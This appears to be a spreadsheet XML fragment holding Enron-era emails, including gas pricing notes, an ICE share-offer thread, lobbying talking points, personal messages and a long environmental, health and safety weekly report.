    <t>Thu, 22 Feb 2001 06:54:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Cali Spread vs Transport</t>
  </si>
  <si>
    <t>I have attached my latest version below.  I still have not located historical _x000D_
monthly index prices for AECO and PG&amp;E City Gate.  However, in lieu of the _x000D_
index numbers I have dropped in the average historical daily prices for each _x000D_
month.  Please let me know if you think this is sufficient for your _x000D_
purposes.  Also, let me know if you need any other _x000D_
interpretations/representations of the historical data._x000D_
_x000D_
_x000D_
_x000D_
Tyrell</t>
  </si>
  <si>
    <t>Thu, 22 Jun 2000 03:46:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'michele.lokay@enron.com'})</t>
  </si>
  <si>
    <t>Wait List Notification - Derivatives I - Applied Energy_x000D_
 Derivatives, beginning on July 27 - 28, 2000</t>
  </si>
  <si>
    <t>You are now on the Wait List for Derivatives I - Applied Energy Derivatives, _x000D_
beginning on July 27 - 28, 2000_x000D_
If space becomes available, you will be notified by e-mail.  _x000D_
_x000D_
If you have any questions, please call the Development Center Team at _x000D_
713-853-0357._x000D_
_x000D_
Thank you.</t>
  </si>
  <si>
    <t>Tue, 9 Oct 2001 08:30:19 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: DealBench in 2002</t>
  </si>
  <si>
    <t>I think you need to push Wasaff_x000D_
--------------------------_x000D_
Sent from my BlackBerry Wireless Handheld</t>
  </si>
  <si>
    <t>Fri, 11 May 2001 02:41:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'eric.moon@enron.com', 'larry.hunter@enron.com'})</t>
  </si>
  <si>
    <t>TAGG-Annuities</t>
  </si>
  <si>
    <t xml:space="preserve">Eric,_x000D_
Please follow up with Joe about how we arrived at the amounts on the _x000D_
annuities.  Thanks._x000D_
DG_x000D_
---------------------- Forwarded by Darron C Giron/HOU/ECT on 05/11/2001 _x000D_
09:40 AM ---------------------------_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Larry Joe Hunter                           05/11/2001 09:05 AM_x000D_
	_x000D_
_x000D_
To: Darron C Giron/HOU/ECT@ECT_x000D_
cc: Julie Brewer/NA/Enron@Enron, Jean Bell/HOU/ECT@ECT _x000D_
Subject: TAGG-Annuities_x000D_
_x000D_
Darron,_x000D_
_x000D_
For audit purposes, can you give us a brief description of where the value _x000D_
for annuities in TAGG as V42434.9 and V42434.A.  We'll add some comments to _x000D_
TAGG to cover ourselves or send out Termination Agreements if necessary._x000D_
_x000D_
Thanks,_x000D_
Joe Hunter_x000D_
</t>
  </si>
  <si>
    <t>Fri, 4 Jan 2002 06:16:42 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'s..muller@enron.com'})</t>
  </si>
  <si>
    <t>Enron's Role in Netco</t>
  </si>
  <si>
    <t>Mark --_x000D_
_x000D_
Who can I speak with about the details of Enron's role in Netco (primarily ownership structure)? I assume that we have structured the arrangements so that FERC won't view Netco as an "affiliate" of Enron.  I want to check with FERC counsel._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Jim</t>
  </si>
  <si>
    <t>Fri, 27 Oct 2000 04:59:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>CRRA document</t>
  </si>
  <si>
    <t>I changed the plant stuff around, swapping most of them for Facility.  I _x000D_
think it is a bit more clear now.  Let me know what else needs to be done._x000D_
_x000D_
_x000D_
_x000D_
I'll be leaving in around 1230 to buy a bribe, I mean pumpkin, but we won't _x000D_
be gone long._x000D_
_x000D_
Kay</t>
  </si>
  <si>
    <t>Thu, 4 May 2000 10:41:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>I have asked Taffy to schedule an interview with the above candidate from _x000D_
10:30 -11:30 on Monday.  Sara and I spoke with her today and think that it is _x000D_
apprpritae to have her come back to met you.  Plesae let Taffy know ASAP if _x000D_
you cannot attend.  Hopefully we can make a decision next week._x000D_
Carol</t>
  </si>
  <si>
    <t>Thu, 24 May 2001 11:55:49 -0700 (PDT)</t>
  </si>
  <si>
    <t>FW: Recommended Offer by ICE for IPE Holdings</t>
  </si>
  <si>
    <t xml:space="preserve">Does our less than 1% get us more relavent info than if we just pulled from publically available?_x000D_
_x000D_
GP_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Boyd, Justin  _x000D_
Sent:	Thursday, May 24, 2001 1:03 PM_x000D_
To:	Piper, Greg_x000D_
Subject:	RE: Recommended Offer by ICE for IPE Holdings_x000D_
_x000D_
Greg_x000D_
_x000D_
We would hold less than 1% of the equity in ICE - so no control at all_x000D_
_x000D_
Justin_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Piper, Greg  _x000D_
Sent:	24 May 2001 17:55_x000D_
To:	Boyd, Justin_x000D_
Subject:	RE: Recommended Offer by ICE for IPE Holdings_x000D_
_x000D_
How much would we own and how much control would we have, if any?_x000D_
_x000D_
Thanks._x000D_
_x000D_
GP_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Boyd, Justin  _x000D_
Sent:	Thursday, May 24, 2001 10:13 AM_x000D_
To:	Piper, Greg; Zipper, Andy_x000D_
Cc:	Brown, Michael_x000D_
Subject:	RE: Recommended Offer by ICE for IPE Holdings_x000D_
_x000D_
Greg, Andy_x000D_
_x000D_
If we accept the Offer, and assuming the Offer receives sufficient acceptances from the other IPE shareholders, then we would hold equity in ICE (in the form of A and B Shares)_x000D_
_x000D_
Justin_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Piper, Greg  _x000D_
Sent:	24 May 2001 15:28_x000D_
To:	Zipper, Andy_x000D_
Cc:	Boyd, Justin; Brown, Michael_x000D_
Subject:	FW: Recommended Offer by ICE for IPE Holdings_x000D_
_x000D_
Your thoughts on this?_x000D_
_x000D_
Also, assuming we accept, then what?  Are we an owner in ICE? _x000D_
_x000D_
GP_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Boyd, Justin  _x000D_
Sent:	Thursday, May 24, 2001 3:57 AM_x000D_
To:	Whalley, Greg; Sherriff, John; Brown, Michael; Piper, Greg; Zipper, Andy_x000D_
Subject:	Recommended Offer by ICE for IPE Holdings_x000D_
_x000D_
This is to point out to you the approaching deadline for accepting ICE's Offer for IPE Holdings.  If we wish to accept this Offer, we must do so no later than 3 pm on Tuesday 29 May._x000D_
_x000D_
In the meantime, Michael has received calls from Richard Ward (IPE's CEO) inquiring as to our position, and it would be my view that we should accept the Offer. (Note that if ICE receives acceptances of 90% or more, then our shares in IPE Holdings will in any event be mandatorily acquired.  And assuming that such level of acceptances will be received, there is no reason for not accepting the Offer)._x000D_
_x000D_
Please would you let me know whether you wish to accept the Offer.  Ideally, if we are to do so, I would plan to send the acceptance by close of business on Friday 25 May._x000D_
_x000D_
_x000D_
Thanks_x000D_
Justin_x000D_
</t>
  </si>
  <si>
    <t>Wed, 4 Apr 2001 06:13:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">To add to what Rick said, I would add that effective DSM requires that price _x000D_
signals be sent to customers AND customers have the ability to repond -- even _x000D_
Mr. I See Market Power Under Every Bush, Dr. Frank Wolak, has as one of his _x000D_
key solutions -- competitive retail markets._x000D_
_x000D_
Sue Mara_x000D_
Enron Corp._x000D_
Tel: (415) 782-7802_x000D_
Fax:(415) 782-7854_x000D_
_x000D_
_x000D_
_x000D_
	Richard Shapiro_x000D_
	04/04/2001 11:07 AM_x000D_
		_x000D_
		 To: Linda Robertson/NA/Enron@ENRON_x000D_
		 cc: Steven J Kean/NA/Enron@Enron, Joe Hartsoe/Corp/Enron@ENRON, Tom _x000D_
Briggs/NA/Enron@Enron, James D Steffes/NA/Enron@Enron, Paul _x000D_
Kaufman/PDX/ECT@ECT, Janine Migden/NA/Enron@Enron, Jean Ryall/NA/Enron@ENRON, _x000D_
Aleck Dadson/TOR/ECT@ECT, Ricardo Charvel/NA/Enron@Enron, Jeff _x000D_
Dasovich/NA/Enron@Enron, Susan J Mara/NA/Enron@ENRON, Jose _x000D_
Bestard/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Steve Montovano/NA/Enron@Enron_x000D_
		 Subject: Re: Lay/Skilling Talking Points for Bush Admin Meetings and Calls_x000D_
_x000D_
_x000D_
	_x000D_
_x000D_
_x000D_
I think these are quite good...the missing piece, I would argue, that we need _x000D_
to include is a talking point on the need for FERC to focus significant _x000D_
resources on the identification and elimination of market power in _x000D_
electricity markets and the need to encourage the development of distributed _x000D_
generation and more effective demand - side response mechanisms , partly in _x000D_
response to market power concerns. This is a huge issue in  getting wholesale _x000D_
electricity markets to work effectively, i.e; to create discernable  consumer _x000D_
welfare benefits.... and we ( Enron ) need to talk about this this issue and _x000D_
concern and talk about it frequently and w/ the same passion we talk about _x000D_
the need for open markets._x000D_
_x000D_
_x000D_
_x000D_
Linda Robertson_x000D_
04/04/2001 12:09 PM_x000D_
To: Steven J Kean/NA/Enron@Enron_x000D_
cc: Richard Shapiro/NA/Enron@Enron, Joe Hartsoe/Corp/Enron@ENRON, Tom _x000D_
Briggs/NA/Enron@Enron _x000D_
_x000D_
Subject: Lay/Skilling Talking Points for Bush Admin Meetings and Calls_x000D_
_x000D_
Steve, per our conversation yesterday in Houston, what do you think of these _x000D_
TPs?  To be used by both Ken and Jeff in conversations and meetings with the _x000D_
Bush Administration._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
 - Skilling Talking Points.doc_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 12 Oct 2000 07:56:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>If I wasn't there what would you do? Yes, I received your e-mails, I can only_x000D_
hope that somehow our relationship will never subside, because you mean a lot_x000D_
to my life._x000D_
_x000D_
                                                        Charles</t>
  </si>
  <si>
    <t>Fri, 8 Mar 2002 14:05:24 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'tk.lohman@enron.com', 'lorraine.lindberg@enron.com', 'susan.wadle@enron.com', 'audrey.robertson@enron.com', 'michelle.lokay@enron.com', 'steven.harris@enron.com', 'kimberly.watson@enron.com', 'lindy.donoho@enron.com', 'mark.mcconnell@enron.com', "paul.y'barbo@enron.com"})</t>
  </si>
  <si>
    <t>Vacation Time Off</t>
  </si>
  <si>
    <t>_x000D_
Just a note to remind everyone I will be on vacation Monday and part of Tuesday of next week.  If you are in need of assistance, please see Susan Wadle at ext. 31878.  She has offered to take care of you guys while I'm out._x000D_
_x000D_
Thanks and have a great weekend._x000D_
_x000D_
adr_x000D_
_x000D_
Audrey D. Robertson_x000D_
Transwestern Pipeline Company _x000D_
email address:  audrey.robertson@enron.com_x000D_
(713) 853-5849_x000D_
(713) 646-2551 Fax</t>
  </si>
  <si>
    <t>Thu, 14 Dec 2000 02:51:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'tony@gatherco.com'})</t>
  </si>
  <si>
    <t>RE: Master Agreement</t>
  </si>
  <si>
    <t>Please send the contracts to my attention at the address below._x000D_
_x000D_
_x000D_
Regards,_x000D_
Debra Perlingiere_x000D_
Enron North America Corp._x000D_
Legal Department_x000D_
1400 Smith Street, EB 3885_x000D_
Houston, Texas 77002_x000D_
dperlin@enron.com_x000D_
Phone 713-853-7658_x000D_
Fax  713-646-3490</t>
  </si>
  <si>
    <t>Wed, 24 Oct 2001 08:51:07 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: Jan Moore 20 Years with Enron</t>
  </si>
  <si>
    <t xml:space="preserve">Great news...are we doing anything specific?  Can we take her to lunch?_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Geaccone, Tracy  _x000D_
Sent:	Wednesday, October 24, 2001 10:49 AM_x000D_
To:	Harris, Steven; Watson, Kimberly; Lokay, Michelle; Lindberg, Lorraine; Robertson, Audrey; Hayslett, Rod; Gilbert, Steve_x000D_
Subject:	Jan Moore 20 Years with Enron_x000D_
_x000D_
FYI Tuesday, October 23 was Jan's 20 year anniversary with Enron. </t>
  </si>
  <si>
    <t>Fri, 31 Mar 2000 00:03:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'kdorland@titanelectric.com'})</t>
  </si>
  <si>
    <t>I am going to stay in Calgary tonight. _x000D_
_x000D_
I am getting a massage tommorow and need to go tanning. I also have some _x000D_
errands to run. _x000D_
_x000D_
Dan and I might come back saturday afternoon._x000D_
_x000D_
What are you guys up to ?_x000D_
_x000D_
w/b_x000D_
_x000D_
Chris</t>
  </si>
  <si>
    <t>Wed, 16 May 2001 08:17:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">Thanks for your response._x000D_
_x000D_
_x000D_
_x000D_
	"A William Urquhart" &lt;awu@quinnemanuel.com&gt;_x000D_
	05/16/2001 12:01 PM_x000D_
		 _x000D_
		 To: &lt;Richard.B.Sanders@enron.com&gt;_x000D_
		 cc: "Gina Clavel" &lt;gc@quinnemanuel.com&gt;_x000D_
		 Subject: Re:_x000D_
_x000D_
_x000D_
Hi Richard--_x000D_
_x000D_
I had dinner with Gilles August, the managing partner of the firm, on _x000D_
Friday.  I think his firm is exactly what you are looking for.  They have a _x000D_
number of partners who had high level partners in the Government.  However, _x000D_
they also have a strong litigation group if that does not work out.  As I _x000D_
said last week, their firm patterns itself after US firms.  Gilles himself is _x000D_
a member of the New York bar._x000D_
_x000D_
I asked Gilles to send you information concerning his firm directly.  Gilles _x000D_
tells me that he is going to be in Texas on business sometime soon.  He would _x000D_
be happy to stop by and visit with your legal team._x000D_
_x000D_
Gina--Will you please e-mail Gilles Richard Sanders contact information, _x000D_
including his e-mail address, his office address and phone contact _x000D_
information._x000D_
_x000D_
&gt;&gt;&gt; &lt;Richard.B.Sanders@enron.com&gt; 05/14/01 03:32PM &gt;&gt;&gt;_x000D_
Can you forward me some information regarding the French firm we discussed_x000D_
last week?_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 24 Sep 2001 20:14:56 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'robyn@layfam.com'})</t>
  </si>
  <si>
    <t>frozenset({'negri.rachel@enron.com', 'zilberfarb.nicole@enron.com', 'crowley.felicia@enron.com', 'herrold.david@enron.com', 'reasoner.harry@enron.com', 'kinder.anne@enron.com', 'aspen.jean@enron.com', 'belfond.le@enron.com', 'howes.kara@enron.com', 'hacker.kathy@enron.com', 'duncan.john@enron.com', 'lagasse.carol@enron.com', 'negri.stephen@enron.com', 'seidl.mick@enron.com', 'didier.kate@enron.com', 'phillips.julie@enron.com', 'martiradonna.jimmy@enron.com', 'gray.randy@enron.com', 'banda.susan@enron.com', 'duncan.brenda@enron.com', 'herrold.dad@enron.com', 'limborg.ronnie@enron.com', 'rosalee.fleming@enron.com', 'lay.linda@enron.com', 'kirby.mike@enron.com', 'herrold.heather@enron.com', 'vermeil.michel@enron.com', 'johnston.jessie@enron.com', 'gaedcke.dewey@enron.com', 'lay.sharon@enron.com', 'flores.leslie@enron.com', 'phillips.ray@enron.com', 'evans.waverly@enron.com', "o'donnell.christina@enron.com", 'bousquet.virginia@enron.com', 'ceron@enron.com', 'smith.jessica@enron.com', 'wade.heidi@enron.com', 'herrold.beau@enron.com', 'lay.kenneth@enron.com', 'korman.josh@enron.com', 'francois@enron.com', 'emerson.christina@enron.com', 'dalrymple.brian@enron.com', 'favereau.jeannot@enron.com', 'korman.holly@enron.com', 'gardberg.susan@enron.com', 'chambers.nancy@enron.com', 'anderson.keith@enron.com', 'eric@enron.com', 'ribes.jean@enron.com', 'vandervliet.barb@enron.com', 'gibson.sherrie@enron.com', 'nicoletta@enron.com', 'l..wells@enron.com', 'rosenstein.jay@enron.com', 'negri.marlene@enron.com', 'david.keezel@enron.com', 'alf@enron.com', 'mcmaster.bill@enron.com', 'gruden.andrej@enron.com', 'sevink.mary@enron.com', 'pop-pop@enron.com', 'stephenson.rick@enron.com', 'rupert.michele@enron.com', 'benton.wynay@enron.com', 'wing.karen@enron.com', 'blizzard.jane@enron.com', 'phillips.emily@enron.com', 'emerson.jimmy@enron.com', 'zylberberg.joyce@enron.com', 'zilberfarb.tami@enron.com', 'moss.jan@enron.com', 'herrold.courtney@enron.com'})</t>
  </si>
  <si>
    <t>Unreal!</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
Hello family and  friends.  I just received this message from, Youri, a friend of mine in  Europe.  He explains that this photo was apparently taken by a tourist  moments before the terrorist airline crash into the World Trade Center and that  the film/camera was found in the ruble and obviously developed.  If this is  real... can you imagine!!!!!!!!!  Totally disturbing, totally  unreal. _x000D_
Robyn_x000D_
 _x000D_
From: MOYO PIERIMARCHI  _x000D_
To: Robyn   _x000D_
Sent: Sunday, September 23, 2001 3:39 PM_x000D_
Subject: youri_x000D_
Bonsoir Robyn_x000D_
j'ai finalement r?ussit a faire l'attestation que  mon p?re devra sign?, j'aimerais avoir ton avis avant!_x000D_
je pense que cela a l'air pas mal! mais je compte  sur ton avis! merci._x000D_
gros bisou j'attend ta r?ponse ciao!_x000D_
 _x000D_
p.s. je t'envoie aussi une photo  extraordinaire prise quelques instants avant la terrible catastrophe du  T.W.C._x000D_
prise par un touriste duquel les secouristes on  retrouvaient l'appareil photo dans les d?combres!!!!_x000D_
hallucinant!! _x000D_
_x000D_
_x000D_
[IMAGE]_x000D_
 _x000D_
 </t>
  </si>
  <si>
    <t>Mon, 18 Dec 2000 01:15:00 -0800 (PST)</t>
  </si>
  <si>
    <t>I just tried to call you.  What is your parents address?_x000D_
_x000D_
-e</t>
  </si>
  <si>
    <t>Fri, 13 Oct 2000 01:44:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'susan.worthen@enron.com'})</t>
  </si>
  <si>
    <t>EHS Weekly Report for 10/13/00</t>
  </si>
  <si>
    <t>ENVIRONMENTAL STRATEGIES_x000D_
_x000D_
Legislation_x000D_
_x000D_
Pipeline Safety - The Senate Pipeline Safety Bill (McCain bill, S. 2438) wa=_x000D_
s=20_x000D_
defeated in the House of Representatives on Tuesday 10/10.   The bill was=_x000D_
=20_x000D_
brought up under "suspension of the rules" in order to avoid possible=20_x000D_
amendments, a procedure which required a two-thirds vote for passage.  The=_x000D_
=20_x000D_
bill fell short by 28 votes, with 232 voting for, and 158 against.   Althou=_x000D_
gh=20_x000D_
the McCain legislation imposed a number of new requirements on pipelines, t=_x000D_
he=20_x000D_
pipeline industry supported S. 2438 as the best achievable legislation, giv=_x000D_
en=20_x000D_
recent accidents and the possible political climate next year.  The=20_x000D_
legislation was defeated in a last minute effort by House Democrats, on mor=_x000D_
e=20_x000D_
political than substantive grounds.   With only a few days remaining in the=_x000D_
=20_x000D_
congressional session, the debate will now turn to efforts to possibly atta=_x000D_
ch=20_x000D_
some form of legislation to a fast-moving appropriations bill.   Industry c=_x000D_
an=20_x000D_
not likely support movement of any legislation other than the Senate bill -=_x000D_
-=20_x000D_
anything suggested by House Democrats at this point to make the legislation=_x000D_
=20_x000D_
stronger would likely be "deal breakers" for industry.  Jeff Keeler will=20_x000D_
remain active in the legislative process until the issue is resolved._x000D_
_x000D_
MTBE - Senate MTBE legislation (S. 2962) which passed the Environment=20_x000D_
Committee several weeks ago is not expected to move on a stand-alone basis,=_x000D_
=20_x000D_
but we are watching to see if efforts to move all or portions of the bill=_x000D_
=20_x000D_
(such as a simple MTBE ban) will take place in the various appropriations=_x000D_
=20_x000D_
efforts.  While we have commitments from various House and Senate leaders=_x000D_
=20_x000D_
that an anti-MTBE measure will not be included, the powerful ethanol forces=_x000D_
=20_x000D_
are working hard to find a way to pass legislation this year.  We have=20_x000D_
avoided inclusion in Agriculture and VA-HUD (EPA) appropriations bills so f=_x000D_
ar=20_x000D_
-- which were the most likely targets for inclusion.   We are prepared to=_x000D_
=20_x000D_
counter any last minute anti-MTBE amendments with amendments providing=20_x000D_
transition funding for MTBE producers, which a number of Senators, includin=_x000D_
g=20_x000D_
ethanol proponents like Tom Daschle, have indicated they would not oppose. =_x000D_
 =20_x000D_
It is most likely that action on this legislation will take place in the ne=_x000D_
xt=20_x000D_
Congress._x000D_
_x000D_
Competitive Intelligence_x000D_
_x000D_
Climate Change - Jeff Keeler continues to participate in activities leading=_x000D_
=20_x000D_
up to the COP 6 meeting in November in the Hague, The Netherlands.   Jeff i=_x000D_
s=20_x000D_
coordinating with EES, ENA, EWC and others within Enron in order to provide=_x000D_
=20_x000D_
the best coverage for these business units during the events before and=20_x000D_
during the COP 6 meeting.   At the Hague meeting, Enron will participate in=_x000D_
=20_x000D_
activities of the Business Council for Sustainable Energy, Pew Center on=20_x000D_
Climate Change, INGAA, and Emissions Marketers Association.   In particular=_x000D_
,=20_x000D_
Jeff is working with several organizations on efforts to develop a response=_x000D_
=20_x000D_
to recent U.S. proposals on Clean Development Mechanism "baselines" that=20_x000D_
could potentially disadvantage gas, renewables, and energy efficiency.  On=_x000D_
=20_x000D_
October 20, Jeff will be speaking at the Forbes Environmental Superconferen=_x000D_
ce=20_x000D_
in Washington, D.C. on a panel addressing "Business Opportunities Resulting=_x000D_
=20_x000D_
from Climate Control".  The panel includes Jeff Seabright from Texaco and D=_x000D_
an=20_x000D_
Reicher from DOE._x000D_
_x000D_
Landfill Gas projects - Stacey Bolton has been working with ENA East=20_x000D_
Origination on regulations, incentive funding, and tax issues affecting=20_x000D_
potential landfill gas projects.=20_x000D_
_x000D_
Green Power Marketing - Stacey Bolton attended the Mid-atlantic power=20_x000D_
marketers meeting in order to receive information on the latest development=_x000D_
s=20_x000D_
that could affect EES, ENA, NPC power marketing efforts._x000D_
_x000D_
Clean Air Act (Multi-pollutant legislation) - Jeff attended a meeting with=_x000D_
=20_x000D_
Ken Lay at Resources for the Future to discuss future legislative options f=_x000D_
or=20_x000D_
pollution control in the electric utility sector, including a=20_x000D_
"multi-pollutant" strategy (for NOx, SO2, Mercury, CO2).   This will likely=_x000D_
=20_x000D_
be the predominant Clean Air Act issue addressed in the next Congress.  Coa=_x000D_
l=20_x000D_
utilities and environmental groups have been meeting to develop some initia=_x000D_
l=20_x000D_
recommendations for the legislation, and Jeff and consultant Joel Bluestien=_x000D_
=20_x000D_
have organized a meeting with environmental groups on 10/25 to ensure that=_x000D_
=20_x000D_
gas, renewables, energy efficiency are included as solutions in any trading=_x000D_
=20_x000D_
or compliance programs._x000D_
_x000D_
Clean Air Act (California offsets) -  Mary Schoen is working with ENA West=_x000D_
=20_x000D_
Origination and EGM Emissions Trading on strategies for finding emissions=_x000D_
=20_x000D_
offsets for Enron power projects planned in several air quality districts i=_x000D_
n=20_x000D_
California.  Offsets are scarce, due to hoarding by PGE and So. Cal Edison=_x000D_
=20_x000D_
from their utility days.   Mary is working on solutions including offsets=_x000D_
=20_x000D_
generated by energy efficiency and diesel engine retrofits on mobile source=_x000D_
s._x000D_
_x000D_
Clean Air Act (NOx State Implementation Plans) -  Mary continues to negotia=_x000D_
te=20_x000D_
with TVA and the TN air pollution control board over the allocation of=20_x000D_
allowances for Enron facilities in Tennessee.   TVA has agreed that Enron=_x000D_
=20_x000D_
should be granted 500 tons of NOx (our permitted levels), but there are sti=_x000D_
ll=20_x000D_
details being worked out in the amendment to Tennessee's SIP which Mary is=_x000D_
=20_x000D_
attending to so that our deal remains in tact._x000D_
_x000D_
Power Quality - Jeff and Mary will be working with EES' new "power quality"=_x000D_
=20_x000D_
group to provide regulatory intelligence on environmental issues that affec=_x000D_
t=20_x000D_
the power quality, reliability and distributed generation markets, includin=_x000D_
g=20_x000D_
opportunities for federal and state financial incentives.   Jeff is setting=_x000D_
=20_x000D_
up meetings with DOE and EPA on October 19 for EES in Washington, D.C._x000D_
_x000D_
Regulatory Compliance:_x000D_
_x000D_
Environmental Disclosure/Labeling - Stacey Bolton is working w/ EES on two=_x000D_
=20_x000D_
disclosure issues involving their quarterly label in California and=20_x000D_
Massachusetts._x000D_
_x000D_
Renewable/Disclosure Credit Trading - Stacey Bolton worked out a potentiall=_x000D_
y=20_x000D_
problematic issue with environmental groups in New England that could have=_x000D_
=20_x000D_
prevented the credit trading information system from moving forward in NEPo=_x000D_
ol._x000D_
_x000D_
ASSET OPERATIONS_x000D_
_x000D_
Administrative_x000D_
_x000D_
EH&amp;S Manager, South America - Edgar Zuleta will now be responsible for EH&amp;S=_x000D_
=20_x000D_
activities in S. America.  Edgar completed the Smith System Trainer course=_x000D_
=20_x000D_
and received Certification._x000D_
_x000D_
OEC/ North America_x000D_
_x000D_
Military Base Projects (Texas, Air Force and Navy) - Scott Watson contacted=_x000D_
=20_x000D_
Allen Rose (Black &amp; Veatch) to ensure environmental issue costs such as=20_x000D_
asbestos abatement, lead paint blasting and transformers (PCB=01,s) were al=_x000D_
l=20_x000D_
addressed in the bid package._x000D_
_x000D_
Enron Corporation=01,s Safety Management System - Scott Watson met with Gar=_x000D_
y=20_x000D_
Allen ETS Safety to discuss the integration of ETS computer based safety=20_x000D_
audit system into the overall corporate project.  Scott is supervising the=_x000D_
=20_x000D_
completion of this project._x000D_
_x000D_
Enron=01,s petition to EPA to waive NSPS stack testing at Wheatland power -=_x000D_
 Gus=20_x000D_
Eghneim received official approval from the EPA of our petition to waive NS=_x000D_
PS=20_x000D_
stack testing at Wheatland power. This petition saved Enron approximately=_x000D_
=20_x000D_
$500,000 as per EES OEC's Mark Dobler=01,s assessment._x000D_
_x000D_
Enron=01,s petition to MDEQ - Gus Eghneim submitted a petition to the=20_x000D_
Mississippi Air pollution Control department to waive stack testing=20_x000D_
requirements currently mandated in the new source review permits of Caledon=_x000D_
ia=20_x000D_
and New Albany Power._x000D_
_x000D_
Permit Revisions for Doyle Power - Gus Eghneim is currently working with th=_x000D_
e=20_x000D_
Georgia department of environmental Quality to revise the new source review=_x000D_
=20_x000D_
permit for Doyle power to relax the opacity requirement and make the permit=_x000D_
=20_x000D_
consistent with current plant operations. Georgia DEQ agreed to increase th=_x000D_
e=20_x000D_
opacity limit from 20% to 40% on gas turbines._x000D_
_x000D_
State Inspection at New Albany Power - New Albany power was subject to a=20_x000D_
state inspection on October 2, 2000.  No noncompliance issues were identifi=_x000D_
ed._x000D_
_x000D_
EPA=01,s acid rain reports for the 2000 peakers - Gus Eghneim and Ramiro Ga=_x000D_
rcia=20_x000D_
are working with Lincoln, Gleason, and Doyle, to ensure submittal of the=20_x000D_
first acid rain EDR reports to the EPA by October 30, 2000._x000D_
_x000D_
Asia/India_x000D_
_x000D_
Marianas Power Plant, Guam - Bal Wong submitted the US EPA PSD Permit,Fuel=_x000D_
=20_x000D_
Switching Protocol  3rd Quarter 2000 reporting._x000D_
_x000D_
Marianas,Batangas Power Corporation and Subic Power Corporation 1999=20_x000D_
Greenhouse Gas=20_x000D_
_x000D_
Emission Data Report - Bal Wong responded to clarification required by Arth=_x000D_
ur=20_x000D_
D Little._x000D_
_x000D_
SK Enron - Translation of Enron EH&amp;S Guidelines into Korean language has be=_x000D_
en=20_x000D_
initiated by Bal Wong.=20_x000D_
_x000D_
Europe_x000D_
_x000D_
Site visit to Marmara, Turkey -  Reviewed operations and Quality Assurance=_x000D_
=20_x000D_
Audit Report.  Working with plant management to determine what assistance i=_x000D_
s=20_x000D_
required and provide support to operations in implementation of EH&amp;S=20_x000D_
Guidelines.=20_x000D_
_x000D_
Acquisition of MG plc Metal trading company - Alan Stringer conducted EH&amp;S=_x000D_
=20_x000D_
reviews of European owned facilities and  identified required improvements =_x000D_
in=20_x000D_
HSE culture.  US and Indonesia facilities will be audited for safety and=20_x000D_
environmental issues in mid-Oct/2000.  Limited baseline assessments may be=_x000D_
=20_x000D_
required in the UK and Rotterdam._x000D_
_x000D_
Acquisition of Metal Recycling Facility in Essen and Nuremberg, Germany -=_x000D_
=20_x000D_
Essen to be leased and recommended baseline investigation at Essen and at=_x000D_
=20_x000D_
Nuremberg to London Engineering Team who are managing this project. =20_x000D_
Supporting the UK engineering team in the development of SPC plans to prote=_x000D_
ct=20_x000D_
indemnities and warranties._x000D_
_x000D_
New Power Project in the UK - Alan Stringer is working  with the Engineerin=_x000D_
g=20_x000D_
Team to determine level of support and review required, including building=_x000D_
=20_x000D_
relationships with project stakeholders._x000D_
_x000D_
Regulatory Database - Alan  Stringer is developing current legislation=20_x000D_
database for Turkey and Poland power plants.  This database will summarize=_x000D_
=20_x000D_
regulations these plants  should be complying with._x000D_
_x000D_
CALME_x000D_
_x000D_
San Juan Gas (SJG) Remediation - The Puerto Rico EQB sent SJG a letter=20_x000D_
addressing issues related to our proposed waste characterization plan. Bill=_x000D_
=20_x000D_
Curra and ThermoRetec developed various technical approaches to address=20_x000D_
concerns from the PR EQB.    A meeting with PR EQB will be set up  in the=_x000D_
=20_x000D_
next couple of weeks to discuss the issues._x000D_
_x000D_
Panama, San Francisco Site  -  Bill Curra will travel to Panama next week t=_x000D_
o=20_x000D_
coordinate the remediation work of the site under a Type I EIA established =_x000D_
in=20_x000D_
the Panamian regulations.  The project is expected to take two to three wee=_x000D_
ks._x000D_
_x000D_
Fire Protection at BLM Plant in Colon - There is no reliable fire protectio=_x000D_
n=20_x000D_
system for Units 2,3,4.  BLM personnel will provide design guidelines to=20_x000D_
Houston EH&amp;S Department and  to fire protection consultants for review. =20_x000D_
_x000D_
BLM Plant in Colon - Secondary containment around fuel storage tanks is=20_x000D_
inadequate to prevent a spill from the storage tank and existing controls t=_x000D_
o=20_x000D_
prevent hydrocarbons from entering the stormwater channels is not functioni=_x000D_
ng=20_x000D_
allowing hydrocarbons to travel to the ocean.  Enron EHS will review=20_x000D_
preliminary design and provide recommendations to BLM.=20_x000D_
_x000D_
Regulatory Technical Analysis_x000D_
_x000D_
Natural Gas Star Workshop - Marc Phillips is attending the Natural Gas Star=_x000D_
=20_x000D_
Workshop on October 12 and 13._x000D_
_x000D_
OSHA Stakeholder Meeting - Russell Tucker attended and addressed the record=_x000D_
=20_x000D_
